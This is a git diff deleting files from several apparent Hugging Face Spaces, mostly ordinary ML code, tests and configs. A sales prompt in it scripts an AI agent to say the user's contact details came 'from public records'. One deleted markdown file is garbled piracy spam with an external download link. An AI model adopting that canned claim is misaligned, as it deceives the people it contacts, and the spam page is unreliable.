00a064420f1361e7be8e69e3542dcfa7a04a2bc9..0000000000000000000000000000000000000000 
--- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/components/carousel.py +++ /dev/null @@ -1,22 +0,0 @@ -"""gr.Carousel() component.""" - -from gradio_client.serializing import SimpleSerializable - -from gradio.components.base import IOComponent -from gradio.events import Changeable - - -class Carousel(IOComponent, Changeable, SimpleSerializable): - """ - Deprecated Component - """ - - def __init__( - self, - *args, - **kwargs, - ): - raise DeprecationWarning( - "The Carousel component is deprecated. Please consider using the Gallery " - "component, which can be used to display images (and optional captions).", - ) diff --git a/spaces/declare-lab/tango/diffusers/src/diffusers/utils/accelerate_utils.py b/spaces/declare-lab/tango/diffusers/src/diffusers/utils/accelerate_utils.py deleted file mode 100644 index 10a83e1dd209cca198f4038d0d7e7228f9671859..0000000000000000000000000000000000000000 --- a/spaces/declare-lab/tango/diffusers/src/diffusers/utils/accelerate_utils.py +++ /dev/null @@ -1,48 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" -Accelerate utilities: Utilities related to accelerate -""" - -from packaging import version - -from .import_utils import is_accelerate_available - - -if is_accelerate_available(): - import accelerate - - -def apply_forward_hook(method): - """ - Decorator that applies a registered CpuOffload hook to an arbitrary function rather than `forward`. This is useful - for cases where a PyTorch module provides functions other than `forward` that should trigger a move to the - appropriate acceleration device. This is the case for `encode` and `decode` in [`AutoencoderKL`]. - - This decorator looks inside the internal `_hf_hook` property to find a registered offload hook. - - :param method: The method to decorate. This method should be a method of a PyTorch module. - """ - if not is_accelerate_available(): - return method - accelerate_version = version.parse(accelerate.__version__).base_version - if version.parse(accelerate_version) < version.parse("0.17.0"): - return method - - def wrapper(self, *args, **kwargs): - if hasattr(self, "_hf_hook") and hasattr(self._hf_hook, "pre_forward"): - self._hf_hook.pre_forward(self) - return method(self, *args, **kwargs) - - return wrapper diff --git a/spaces/declare-lab/tango/diffusers/tests/pipelines/versatile_diffusion/test_versatile_diffusion_text_to_image.py b/spaces/declare-lab/tango/diffusers/tests/pipelines/versatile_diffusion/test_versatile_diffusion_text_to_image.py deleted file mode 100644 index 194f660f7055308b41c47c14a35c41f3b2b1014b..0000000000000000000000000000000000000000 --- a/spaces/declare-lab/tango/diffusers/tests/pipelines/versatile_diffusion/test_versatile_diffusion_text_to_image.py +++ /dev/null @@ -1,87 +0,0 @@ -# coding=utf-8 -# Copyright 2023 HuggingFace Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. 
-# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import gc -import tempfile -import unittest - -import numpy as np -import torch - -from diffusers import VersatileDiffusionTextToImagePipeline -from diffusers.utils.testing_utils import nightly, require_torch_gpu, torch_device - - -torch.backends.cuda.matmul.allow_tf32 = False - - -class VersatileDiffusionTextToImagePipelineFastTests(unittest.TestCase): - pass - - -@nightly -@require_torch_gpu -class VersatileDiffusionTextToImagePipelineIntegrationTests(unittest.TestCase): - def tearDown(self): - # clean up the VRAM after each test - super().tearDown() - gc.collect() - torch.cuda.empty_cache() - - def test_remove_unused_weights_save_load(self): - pipe = VersatileDiffusionTextToImagePipeline.from_pretrained("shi-labs/versatile-diffusion") - # remove text_unet - pipe.remove_unused_weights() - pipe.to(torch_device) - pipe.set_progress_bar_config(disable=None) - - prompt = "A painting of a squirrel eating a burger " - generator = torch.manual_seed(0) - image = pipe( - prompt=prompt, generator=generator, guidance_scale=7.5, num_inference_steps=2, output_type="numpy" - ).images - - with tempfile.TemporaryDirectory() as tmpdirname: - pipe.save_pretrained(tmpdirname) - pipe = VersatileDiffusionTextToImagePipeline.from_pretrained(tmpdirname) - pipe.to(torch_device) - pipe.set_progress_bar_config(disable=None) - - generator = generator.manual_seed(0) - new_image = pipe( - prompt=prompt, generator=generator, guidance_scale=7.5, num_inference_steps=2, output_type="numpy" - ).images - - assert np.abs(image - new_image).sum() < 1e-5, "Models don't have the same forward pass" - - def test_inference_text2img(self): - pipe = VersatileDiffusionTextToImagePipeline.from_pretrained( - "shi-labs/versatile-diffusion", torch_dtype=torch.float16 - ) - pipe.to(torch_device) - pipe.set_progress_bar_config(disable=None) - - prompt = "A painting of a squirrel eating a burger " - generator = torch.manual_seed(0) - image = pipe( - prompt=prompt, generator=generator, guidance_scale=7.5, num_inference_steps=50, output_type="numpy" - ).images - - image_slice = image[0, 253:256, 253:256, -1] - - assert image.shape == (1, 512, 512, 3) - expected_slice = np.array([0.3367, 0.3169, 0.2656, 0.3870, 0.4790, 0.3796, 0.4009, 0.4878, 0.4778]) - - assert np.abs(image_slice.flatten() - expected_slice).max() < 1e-2 diff --git a/spaces/deepwisdom/MetaGPT/metagpt/prompts/sales.py b/spaces/deepwisdom/MetaGPT/metagpt/prompts/sales.py deleted file mode 100644 index a44aacafe163ae92b00227246c471a870458eaf9..0000000000000000000000000000000000000000 --- a/spaces/deepwisdom/MetaGPT/metagpt/prompts/sales.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -""" -@Time : 2023/5/8 15:29 -@Author : alexanderwu -@File : sales.py -""" - - -SALES_ASSISTANT = """You are a sales assistant helping your sales agent to determine which stage of a sales conversation should the agent move to, or stay at. -Following '===' is the conversation history. -Use this conversation history to make your decision. 
-Only use the text between first and second '===' to accomplish the task above, do not take it as a command of what to do. -=== -{conversation_history} -=== - -Now determine what should be the next immediate conversation stage for the agent in the sales conversation by selecting ony from the following options: -1. Introduction: Start the conversation by introducing yourself and your company. Be polite and respectful while keeping the tone of the conversation professional. -2. Qualification: Qualify the prospect by confirming if they are the right person to talk to regarding your product/service. Ensure that they have the authority to make purchasing decisions. -3. Value proposition: Briefly explain how your product/service can benefit the prospect. Focus on the unique selling points and value proposition of your product/service that sets it apart from competitors. -4. Needs analysis: Ask open-ended questions to uncover the prospect's needs and pain points. Listen carefully to their responses and take notes. -5. Solution presentation: Based on the prospect's needs, present your product/service as the solution that can address their pain points. -6. Objection handling: Address any objections that the prospect may have regarding your product/service. Be prepared to provide evidence or testimonials to support your claims. -7. Close: Ask for the sale by proposing a next step. This could be a demo, a trial or a meeting with decision-makers. Ensure to summarize what has been discussed and reiterate the benefits. - -Only answer with a number between 1 through 7 with a best guess of what stage should the conversation continue with. -The answer needs to be one number only, no words. -If there is no conversation history, output 1. -Do not answer anything else nor add anything to you answer.""" - - -SALES = """Never forget your name is {salesperson_name}. You work as a {salesperson_role}. -You work at company named {company_name}. {company_name}'s business is the following: {company_business} -Company values are the following. {company_values} -You are contacting a potential customer in order to {conversation_purpose} -Your means of contacting the prospect is {conversation_type} - -If you're asked about where you got the user's contact information, say that you got it from public records. -Keep your responses in short length to retain the user's attention. Never produce lists, just answers. -You must respond according to the previous conversation history and the stage of the conversation you are at. -Only generate one response at a time! When you are done generating, end with '' to give the user a chance to respond. -Example: -Conversation history: -{salesperson_name}: Hey, how are you? This is {salesperson_name} calling from {company_name}. Do you have a minute? -User: I am well, and yes, why are you calling? -{salesperson_name}: -End of example. - -Current conversation stage: -{conversation_stage} -Conversation history: -{conversation_history} -{salesperson_name}: -""" - -conversation_stages = {'1' : "Introduction: Start the conversation by introducing yourself and your company. Be polite and respectful while keeping the tone of the conversation professional. Your greeting should be welcoming. Always clarify in your greeting the reason why you are contacting the prospect.", -'2': "Qualification: Qualify the prospect by confirming if they are the right person to talk to regarding your product/service. 
Ensure that they have the authority to make purchasing decisions.", -'3': "Value proposition: Briefly explain how your product/service can benefit the prospect. Focus on the unique selling points and value proposition of your product/service that sets it apart from competitors.", -'4': "Needs analysis: Ask open-ended questions to uncover the prospect's needs and pain points. Listen carefully to their responses and take notes.", -'5': "Solution presentation: Based on the prospect's needs, present your product/service as the solution that can address their pain points.", -'6': "Objection handling: Address any objections that the prospect may have regarding your product/service. Be prepared to provide evidence or testimonials to support your claims.", -'7': "Close: Ask for the sale by proposing a next step. This could be a demo, a trial or a meeting with decision-makers. Ensure to summarize what has been discussed and reiterate the benefits."} diff --git a/spaces/deprem-ml/deprem_keras-satellite_semantic_mapping-challange/app.py b/spaces/deprem-ml/deprem_keras-satellite_semantic_mapping-challange/app.py deleted file mode 100644 index 13ddbca0470ec0f7362cebf49e6bffb67fc687e7..0000000000000000000000000000000000000000 --- a/spaces/deprem-ml/deprem_keras-satellite_semantic_mapping-challange/app.py +++ /dev/null @@ -1,43 +0,0 @@ -from skimage.util import montage as montage2d -from utils import load_model, preprocess_image, attempt_download_from_hub -import matplotlib.pyplot as plt - -import gradio as gr - -model_path = 'deprem-ml/deprem-keras-satellite-semantic-mapping' - -def keras_inference(img_data, model_path): - model_path = attempt_download_from_hub(model_path) - seg_model = load_model(model_path) - out_img = preprocess_image(img_data) - pred_y = seg_model.predict(out_img) - - plt.imshow(montage2d(pred_y[:, :, :, 0]), cmap = 'bone_r') - plt.savefig('output.png') - return 'output.png' - -inputs = [ - gr.Image(type='filepath', label='Image'), - gr.Dropdown([model_path], value=model_path, label='Model Path') -] - -outputs = gr.Image(label='Segmentation') - -examples = [ - ['data/testv1.jpg', model_path], - ['data/testv2.jpg', model_path], - ['data/testv3.jpg', model_path], -] - -title = 'Segmenting Buildings in Satellite Images with Keras' - -demo_app = gr.Interface( - keras_inference, - inputs, - outputs, - title=title, - examples=examples, - cache_examples=True, -) - -demo_app.launch(debug=True, enable_queue=True) diff --git a/spaces/diacanFperku/AutoGPT/Band Baaja Baaraat Movie Free _HOT_ Download 1080p Movies.md b/spaces/diacanFperku/AutoGPT/Band Baaja Baaraat Movie Free _HOT_ Download 1080p Movies.md deleted file mode 100644 index f81c39cb78994603f5df7f5338996585e4469c43..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Band Baaja Baaraat Movie Free _HOT_ Download 1080p Movies.md +++ /dev/null @@ -1,12 +0,0 @@ -

        Band Baaja Baaraat movie free download 1080p movies


        Download 🌟 https://gohhs.com/2uFUuq



        -
-band baaja baaraat movie 1080p movies hd youtube ru songs from youtube how to make music at the beginning of mp3 songs from youtube how to make a video at the beginning! -And them with pleasure. -How can I make a splash screen appear at the beginning? -Every video on YouTube has an intro. -This is not the first time I've watched this video. -But how can I add music at the beginning of an mp3 song from YouTube, and how can I make the video without an intro? 8a78ff9644
        -
        -
        -

        diff --git a/spaces/digitalxingtong/Azusa-Bert-VITS2/text/cleaner.py b/spaces/digitalxingtong/Azusa-Bert-VITS2/text/cleaner.py deleted file mode 100644 index 64bd5f7296f66c94f3a335666c53706bb5fe5b39..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Azusa-Bert-VITS2/text/cleaner.py +++ /dev/null @@ -1,27 +0,0 @@ -from text import chinese, cleaned_text_to_sequence - - -language_module_map = { - 'ZH': chinese -} - - -def clean_text(text, language): - language_module = language_module_map[language] - norm_text = language_module.text_normalize(text) - phones, tones, word2ph = language_module.g2p(norm_text) - return norm_text, phones, tones, word2ph - -def clean_text_bert(text, language): - language_module = language_module_map[language] - norm_text = language_module.text_normalize(text) - phones, tones, word2ph = language_module.g2p(norm_text) - bert = language_module.get_bert_feature(norm_text, word2ph) - return phones, tones, bert - -def text_to_sequence(text, language): - norm_text, phones, tones, word2ph = clean_text(text, language) - return cleaned_text_to_sequence(phones, tones, language) - -if __name__ == '__main__': - pass diff --git a/spaces/digitalxingtong/Lixiang-Bert-Vits2/text/english.py b/spaces/digitalxingtong/Lixiang-Bert-Vits2/text/english.py deleted file mode 100644 index 781d0a56cef71f66fc67db51d76538be90d3ddd2..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Lixiang-Bert-Vits2/text/english.py +++ /dev/null @@ -1,138 +0,0 @@ -import pickle -import os -import re -from g2p_en import G2p -from string import punctuation - -from text import symbols - -current_file_path = os.path.dirname(__file__) -CMU_DICT_PATH = os.path.join(current_file_path, 'cmudict.rep') -CACHE_PATH = os.path.join(current_file_path, 'cmudict_cache.pickle') -_g2p = G2p() - -arpa = {'AH0', 'S', 'AH1', 'EY2', 'AE2', 'EH0', 'OW2', 'UH0', 'NG', 'B', 'G', 'AY0', 'M', 'AA0', 'F', 'AO0', 'ER2', 'UH1', 'IY1', 'AH2', 'DH', 'IY0', 'EY1', 'IH0', 'K', 'N', 'W', 'IY2', 'T', 'AA1', 'ER1', 'EH2', 'OY0', 'UH2', 'UW1', 'Z', 'AW2', 'AW1', 'V', 'UW2', 'AA2', 'ER', 'AW0', 'UW0', 'R', 'OW1', 'EH1', 'ZH', 'AE0', 'IH2', 'IH', 'Y', 'JH', 'P', 'AY1', 'EY0', 'OY2', 'TH', 'HH', 'D', 'ER0', 'CH', 'AO1', 'AE1', 'AO2', 'OY1', 'AY2', 'IH1', 'OW0', 'L', 'SH'} - - -def post_replace_ph(ph): - rep_map = { - ':': ',', - ';': ',', - ',': ',', - '。': '.', - '!': '!', - '?': '?', - '\n': '.', - "·": ",", - '、': ",", - '...': '…', - 'v': "V" - } - if ph in rep_map.keys(): - ph = rep_map[ph] - if ph in symbols: - return ph - if ph not in symbols: - ph = 'UNK' - return ph - -def read_dict(): - g2p_dict = {} - start_line = 49 - with open(CMU_DICT_PATH) as f: - line = f.readline() - line_index = 1 - while line: - if line_index >= start_line: - line = line.strip() - word_split = line.split(' ') - word = word_split[0] - - syllable_split = word_split[1].split(' - ') - g2p_dict[word] = [] - for syllable in syllable_split: - phone_split = syllable.split(' ') - g2p_dict[word].append(phone_split) - - line_index = line_index + 1 - line = f.readline() - - return g2p_dict - - -def cache_dict(g2p_dict, file_path): - with open(file_path, 'wb') as pickle_file: - pickle.dump(g2p_dict, pickle_file) - - -def get_dict(): - if os.path.exists(CACHE_PATH): - with open(CACHE_PATH, 'rb') as pickle_file: - g2p_dict = pickle.load(pickle_file) - else: - g2p_dict = read_dict() - cache_dict(g2p_dict, CACHE_PATH) - - return g2p_dict - -eng_dict = get_dict() - -def refine_ph(phn): - tone = 0 - if re.search(r'\d$', phn): - tone = 
int(phn[-1]) + 1 - phn = phn[:-1] - return phn.lower(), tone - -def refine_syllables(syllables): - tones = [] - phonemes = [] - for phn_list in syllables: - for i in range(len(phn_list)): - phn = phn_list[i] - phn, tone = refine_ph(phn) - phonemes.append(phn) - tones.append(tone) - return phonemes, tones - - -def text_normalize(text): - # todo: eng text normalize - return text - -def g2p(text): - - phones = [] - tones = [] - words = re.split(r"([,;.\-\?\!\s+])", text) - for w in words: - if w.upper() in eng_dict: - phns, tns = refine_syllables(eng_dict[w.upper()]) - phones += phns - tones += tns - else: - phone_list = list(filter(lambda p: p != " ", _g2p(w))) - for ph in phone_list: - if ph in arpa: - ph, tn = refine_ph(ph) - phones.append(ph) - tones.append(tn) - else: - phones.append(ph) - tones.append(0) - # todo: implement word2ph - word2ph = [1 for i in phones] - - phones = [post_replace_ph(i) for i in phones] - return phones, tones, word2ph - -if __name__ == "__main__": - # print(get_dict()) - # print(eng_word_to_phoneme("hello")) - print(g2p("In this paper, we propose 1 DSPGAN, a GAN-based universal vocoder.")) - # all_phones = set() - # for k, syllables in eng_dict.items(): - # for group in syllables: - # for ph in group: - # all_phones.add(ph) - # print(all_phones) \ No newline at end of file diff --git a/spaces/digitalxingtong/Luzao-Bert-Vits2/commons.py b/spaces/digitalxingtong/Luzao-Bert-Vits2/commons.py deleted file mode 100644 index 9ad0444b61cbadaa388619986c2889c707d873ce..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Luzao-Bert-Vits2/commons.py +++ /dev/null @@ -1,161 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. 
* logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): 
- parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/dineshreddy/WALT/mmdet/apis/inference.py b/spaces/dineshreddy/WALT/mmdet/apis/inference.py deleted file mode 100644 index 464d1e2dec8bd30304ec8018922681fe63b77970..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/mmdet/apis/inference.py +++ /dev/null @@ -1,217 +0,0 @@ -import warnings - -import mmcv -import numpy as np -import torch -from mmcv.ops import RoIPool -from mmcv.parallel import collate, scatter -from mmcv.runner import load_checkpoint - -from mmdet.core import get_classes -from mmdet.datasets import replace_ImageToTensor -from mmdet.datasets.pipelines import Compose -from mmdet.models import build_detector - - -def init_detector(config, checkpoint=None, device='cuda:0', cfg_options=None): - """Initialize a detector from config file. - - Args: - config (str or :obj:`mmcv.Config`): Config file path or the config - object. - checkpoint (str, optional): Checkpoint path. If left as None, the model - will not load any weights. - cfg_options (dict): Options to override some settings in the used - config. - - Returns: - nn.Module: The constructed detector. - """ - if isinstance(config, str): - config = mmcv.Config.fromfile(config) - elif not isinstance(config, mmcv.Config): - raise TypeError('config must be a filename or Config object, ' - f'but got {type(config)}') - if cfg_options is not None: - config.merge_from_dict(cfg_options) - config.model.pretrained = None - config.model.train_cfg = None - model = build_detector(config.model, test_cfg=config.get('test_cfg')) - if checkpoint is not None: - map_loc = 'cpu' if device == 'cpu' else None - checkpoint = load_checkpoint(model, checkpoint, map_location=map_loc) - if 'CLASSES' in checkpoint.get('meta', {}): - model.CLASSES = checkpoint['meta']['CLASSES'] - else: - warnings.simplefilter('once') - warnings.warn('Class names are not saved in the checkpoint\'s ' - 'meta data, use COCO classes by default.') - model.CLASSES = get_classes('coco') - model.cfg = config # save the config in the model for convenience - model.to(device) - model.eval() - return model - - -class LoadImage(object): - """Deprecated. - - A simple pipeline to load image. - """ - - def __call__(self, results): - """Call function to load images into results. - - Args: - results (dict): A result dict contains the file name - of the image to be read. - Returns: - dict: ``results`` will be returned containing loaded image. - """ - warnings.simplefilter('once') - warnings.warn('`LoadImage` is deprecated and will be removed in ' - 'future releases. 
You may use `LoadImageFromWebcam` ' - 'from `mmdet.datasets.pipelines.` instead.') - if isinstance(results['img'], str): - results['filename'] = results['img'] - results['ori_filename'] = results['img'] - else: - results['filename'] = None - results['ori_filename'] = None - img = mmcv.imread(results['img']) - results['img'] = img - results['img_fields'] = ['img'] - results['img_shape'] = img.shape - results['ori_shape'] = img.shape - return results - - -def inference_detector(model, imgs): - """Inference image(s) with the detector. - - Args: - model (nn.Module): The loaded detector. - imgs (str/ndarray or list[str/ndarray] or tuple[str/ndarray]): - Either image files or loaded images. - - Returns: - If imgs is a list or tuple, the same length list type results - will be returned, otherwise return the detection results directly. - """ - - if isinstance(imgs, (list, tuple)): - is_batch = True - else: - imgs = [imgs] - is_batch = False - - cfg = model.cfg - device = next(model.parameters()).device # model device - - if isinstance(imgs[0], np.ndarray): - cfg = cfg.copy() - # set loading pipeline type - cfg.data.test.pipeline[0].type = 'LoadImageFromWebcam' - - cfg.data.test.pipeline = replace_ImageToTensor(cfg.data.test.pipeline) - test_pipeline = Compose(cfg.data.test.pipeline) - - datas = [] - for img in imgs: - # prepare data - if isinstance(img, np.ndarray): - # directly add img - data = dict(img=img) - else: - # add information into dict - data = dict(img_info=dict(filename=img), img_prefix=None) - # build the data pipeline - data = test_pipeline(data) - datas.append(data) - - data = collate(datas, samples_per_gpu=len(imgs)) - # just get the actual data from DataContainer - data['img_metas'] = [img_metas.data[0] for img_metas in data['img_metas']] - data['img'] = [img.data[0] for img in data['img']] - if next(model.parameters()).is_cuda: - # scatter to specified GPU - data = scatter(data, [device])[0] - else: - for m in model.modules(): - assert not isinstance( - m, RoIPool - ), 'CPU inference with RoIPool is not supported currently.' - - # forward the model - with torch.no_grad(): - results = model(return_loss=False, rescale=True, **data) - - if not is_batch: - return results[0] - else: - return results - - -async def async_inference_detector(model, img): - """Async inference image(s) with the detector. - - Args: - model (nn.Module): The loaded detector. - img (str | ndarray): Either image files or loaded images. - - Returns: - Awaitable detection results. - """ - cfg = model.cfg - device = next(model.parameters()).device # model device - # prepare data - if isinstance(img, np.ndarray): - # directly add img - data = dict(img=img) - cfg = cfg.copy() - # set loading pipeline type - cfg.data.test.pipeline[0].type = 'LoadImageFromWebcam' - else: - # add information into dict - data = dict(img_info=dict(filename=img), img_prefix=None) - # build the data pipeline - test_pipeline = Compose(cfg.data.test.pipeline) - data = test_pipeline(data) - data = scatter(collate([data], samples_per_gpu=1), [device])[0] - - # We don't restore `torch.is_grad_enabled()` value during concurrent - # inference since execution can overlap - torch.set_grad_enabled(False) - result = await model.aforward_test(rescale=True, **data) - return result - - -def show_result_pyplot(model, - img, - result, - score_thr=0.3, - title='result', - wait_time=0): - """Visualize the detection results on the image. - - Args: - model (nn.Module): The loaded detector. - img (str or np.ndarray): Image filename or loaded image. 
- result (tuple[list] or list): The detection result, can be either - (bbox, segm) or just bbox. - score_thr (float): The threshold to visualize the bboxes and masks. - title (str): Title of the pyplot figure. - wait_time (float): Value of waitKey param. - Default: 0. - """ - if hasattr(model, 'module'): - model = model.module - model.show_result( - img, - result, - score_thr=score_thr, - show=True, - wait_time=wait_time, - win_name=title, - bbox_color=(72, 101, 241), - text_color=(72, 101, 241)) diff --git a/spaces/dinhminh20521597/OCR_DEMO/configs/textrecog/nrtr/nrtr_r31_1by16_1by8_academic.py b/spaces/dinhminh20521597/OCR_DEMO/configs/textrecog/nrtr/nrtr_r31_1by16_1by8_academic.py deleted file mode 100644 index b7adc0d30cda5e5556821ff941d6e00dcd3b4ba7..0000000000000000000000000000000000000000 --- a/spaces/dinhminh20521597/OCR_DEMO/configs/textrecog/nrtr/nrtr_r31_1by16_1by8_academic.py +++ /dev/null @@ -1,48 +0,0 @@ -_base_ = [ - '../../_base_/default_runtime.py', - '../../_base_/schedules/schedule_adam_step_6e.py', - '../../_base_/recog_pipelines/nrtr_pipeline.py', - '../../_base_/recog_datasets/ST_MJ_train.py', - '../../_base_/recog_datasets/academic_test.py' -] - -train_list = {{_base_.train_list}} -test_list = {{_base_.test_list}} - -train_pipeline = {{_base_.train_pipeline}} -test_pipeline = {{_base_.test_pipeline}} - -label_convertor = dict( - type='AttnConvertor', dict_type='DICT90', with_unknown=True) - -model = dict( - type='NRTR', - backbone=dict( - type='ResNet31OCR', - layers=[1, 2, 5, 3], - channels=[32, 64, 128, 256, 512, 512], - stage4_pool_cfg=dict(kernel_size=(2, 1), stride=(2, 1)), - last_stage_pool=True), - encoder=dict(type='NRTREncoder'), - decoder=dict(type='NRTRDecoder'), - loss=dict(type='TFLoss'), - label_convertor=label_convertor, - max_seq_len=40) - -data = dict( - samples_per_gpu=128, - workers_per_gpu=4, - train=dict( - type='UniformConcatDataset', - datasets=train_list, - pipeline=train_pipeline), - val=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline), - test=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline)) - -evaluation = dict(interval=1, metric='acc') diff --git a/spaces/dinnovos/chatbot-shoe-store/README.md b/spaces/dinnovos/chatbot-shoe-store/README.md deleted file mode 100644 index 2a43718e77af61f1feaf60ab729a40e8dedcbe13..0000000000000000000000000000000000000000 --- a/spaces/dinnovos/chatbot-shoe-store/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Chatbot for Shoe Store -emoji: 📚 -colorFrom: yellow -colorTo: blue -sdk: streamlit -sdk_version: 1.21.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/dma123/gpt-js/index.html b/spaces/dma123/gpt-js/index.html deleted file mode 100644 index 431922abf46aac283bc8d54e35971d6c16822440..0000000000000000000000000000000000000000 --- a/spaces/dma123/gpt-js/index.html +++ /dev/null @@ -1,129 +0,0 @@ - - - - - - - GPT JS Chat - - - - - -
        - -
        -
        -
        -
        - - -
        -
        -
        - - -
        -

            - - - -
        -
        -

        -
        - -
        - -
        - - -

        -

        -
        - - -

        -

        -
        - - -

        -

        -
        - -
        - -
        - - -

        -

        -

        -
        -
        - - -
        -
        - - -
        -
        -

        -
        - - - - - - - - - - - - - \ No newline at end of file diff --git a/spaces/doevent/blip/train_caption.py b/spaces/doevent/blip/train_caption.py deleted file mode 100644 index 7c639ac646b9a1b8074b6e9c2343b961de76db05..0000000000000000000000000000000000000000 --- a/spaces/doevent/blip/train_caption.py +++ /dev/null @@ -1,206 +0,0 @@ -''' - * Copyright (c) 2022, salesforce.com, inc. - * All rights reserved. - * SPDX-License-Identifier: BSD-3-Clause - * For full license text, see LICENSE.txt file in the repo root or https://opensource.org/licenses/BSD-3-Clause - * By Junnan Li -''' -import argparse -import os -import ruamel_yaml as yaml -import numpy as np -import random -import time -import datetime -import json -from pathlib import Path - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.backends.cudnn as cudnn -import torch.distributed as dist -from torch.utils.data import DataLoader - -from models.blip import blip_decoder -import utils -from utils import cosine_lr_schedule -from data import create_dataset, create_sampler, create_loader -from data.utils import save_result, coco_caption_eval - -def train(model, data_loader, optimizer, epoch, device): - # train - model.train() - - metric_logger = 